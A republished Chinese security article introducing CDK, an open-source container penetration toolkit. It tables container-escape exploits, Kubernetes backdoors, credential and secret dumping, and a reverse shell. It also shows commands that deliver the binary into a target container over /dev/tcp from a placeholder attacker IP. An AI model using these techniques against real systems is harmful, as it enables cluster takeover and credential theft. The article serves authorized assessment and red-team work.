容器渗透测试神器降临!一款工具搞定容器逃逸、K8s集群接管与云原生安全评估

admin 2026-09-22 06:00:59 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍开源容器渗透测试工具CDK,专为精简容器环境设计,零依赖、多架构支持。工具集成信息收集、漏洞利用、网络工具三大模块,支持容器逃逸、持久化控制、K8s集群横向移动等高危操作,适用于容器安全评估、红队渗透测试与应急响应场景。文章末尾含广告推广内容。 综合评分: 62 文章分类: 渗透测试,红队,云安全,安全工具,应急响应


容器渗透测试神器降临!一款工具搞定容器逃逸、K8s集群接管与云原生安全评估

棉花糖糖糖 棉花糖糖糖

棉花糖网络安全工具箱

2026年9月20日 10:48 四川

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

重点导读免责声明

本工具仅用于合法安全测试,未经授权禁止用于攻击任何系统。

重点导读简介

CDK是一款开源容器渗透工具包,专为在精简容器环境中稳定利用漏洞而设计,零操作系统依赖。工具集成信息收集、漏洞利用、网络工具三大功能模块,支持容器逃逸、持久化控制、K8s集群横向移动等高危操作。

重点导读核心架构

PART 01模块设计

| 模块 | 功能 | 说明 | | — | — | — | | Evaluate | 信息收集 | 探测容器内部弱点 | | Exploit | 漏洞利用 | 容器逃逸与权限提升 | | Tool | 网络工具 | TCP隧道、HTTP请求、K8s API调用 |

PART 02技术特性

  • 零依赖:静态编译,无glibc等系统库要求
  • 多架构:支持amd64、arm64等主流平台
  • 轻量级:thin版本仅2MB,Serverless场景可用
  • 模块化:各模块独立,可按需组合

重点导读Evaluate模块

信息收集模块,自动探测容器安全配置缺陷。

PART 03检测范围

| 类别 | 检测项 | | — | — | | 系统信息 | OS版本、用户、进程、环境变量 | | 权限配置 | Capabilities、内网Namespace | | 敏感资源 | 挂载点、ServiceAccount、云元数据API | | K8s配置 | Api-server端点、认证信息、Pod安全策略 |

PART 04使用方式

bashcdk evaluate --full

重点导读Exploit模块

漏洞利用模块,支持多种容器逃逸与集群攻击技术。

PART 05逃逸技术

| 技术 | 编号 | 说明 | | — | — | — | | runc CVE-2019-5736 | runc-pwn | Docker Runc漏洞 | | containerd-shim CVE-2020-15257 | shim-pwn | 容器运行时漏洞 | | docker.sock攻击 | docker-sock-pwn | 容器逃逸与后门部署 | | Device Mount | mount-disk | 设备挂载逃逸 | | Cgroups | mount-cgroup | Cgroups权限逃逸 | | Procfs | mount-procfs | Procfs伪装逃逸 | | CAP_DAC_READ_SEARCH | cap-dac-read-search | 任意文件读取 | | CVE-2022-0492 | abuse-unpriv-userns | 非特权用户命名空间 |

PART 06持久化控制

| 技术 | 编号 | 说明 | | — | — | — | | WebShell | webshell-deploy | 部署Web后门 | | DaemonSet | k8s-backdoor-daemonset | K8s后门守护 | | Shadow APIServer | k8s-shadow-apiserver | 影子API服务器 | | CronJob | k8s-cronjob | 定时任务后门 | | MITM攻击 | k8s-mitm-clusterip | CVE-2020-8554中间人 |

PART 07凭证窃取

| 技术 | 编号 | 说明 | | — | — | — | | Registry暴力破解 | registry-brute | 镜像仓库凭证 | | AK泄露检测 | ak-leakage | 云AccessKey扫描 | | Etcd token | etcd-get-k8s-token | K8s认证令牌 | | Secrets导出 | k8s-secret-dump | K8s密钥导出 | | ConfigMap导出 | k8s-configmap-dump | 配置信息窃取 |

PART 08横向移动

| 技术 | 编号 | 说明 | | — | — | — | | RBAC绕过 | k8s-get-sa-token | K8s认证令牌窃取 | | Kubelet Exec | kubelet-exec | 节点命令执行 | | 反向Shell | reverse-shell | 远程控制通道 |

重点导读Tool模块

网络工具集,替代容器内缺失的系统命令。

PART 09工具列表

| 命令 | 功能 | | — | — | | nc | TCP隧道建立 | | ps | 进程信息查看 | | netstat | 网络连接状态 | | ifconfig | 网络接口信息 | | vi | 文件编辑 | | kcurl | K8s API请求 | | dcurl | Docker HTTP API | | ucurl | Docker Unix Socket | | ectl | Etcd键值枚举 | | probe | 端口扫描 |

重点导读应用场景

PART 10容器安全评估

在已获得容器Shell的情况下,使用evaluate模块全面探测安全配置缺陷,获取下一步攻击路径。

PART 11红队渗透测试

利用exploit模块快速完成容器逃逸、节点权限提升、K8s集群控制等高难度操作。

PART 12应急响应

使用tool模块快速收集容器内网络、进程、凭证信息,支撑事件调查。

重点导读部署方式

PART 13直接投递

将二进制文件直接上传至目标容器:

bashnc -lvp 999 < cdk
# 目标容器内执行
cat < /dev/tcp/your_ip/999 > cdk
chmod a+x cdk

PART 14编译定制

根据需要选择特定模块编译轻量版本:

bashgo build -tags "thin" ./cmd/cdk

重点导读项目地址

本公众号非项目作者,仅做技术分享。

https://github.com/cdk-team/CDK

广告时间

低价考证包括但不限于CISP系列、PMP等等国内网安证书、网络安全交流群请关注公众号后点菜单栏的找棉花糖。

糖心会员站,网络安全必备网站,包括在线内网靶场、web靶场、src靶场、应急响应靶场,以及各种网安资料、教程、方案模版、以及超级多在线工具,99元包年!详细介绍:棉花糖会员站介绍(26年4月26日版本) :在线内网靶场、网安资料方案、在线工具全能资源站,看完介绍百分百心动!


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:棉花糖网络安全工具箱 棉花糖糖糖 棉花糖糖糖《容器渗透测试神器降临!一款工具搞定容器逃逸、K8s集群接管与云原生安全评估》

评论:0   参与:  0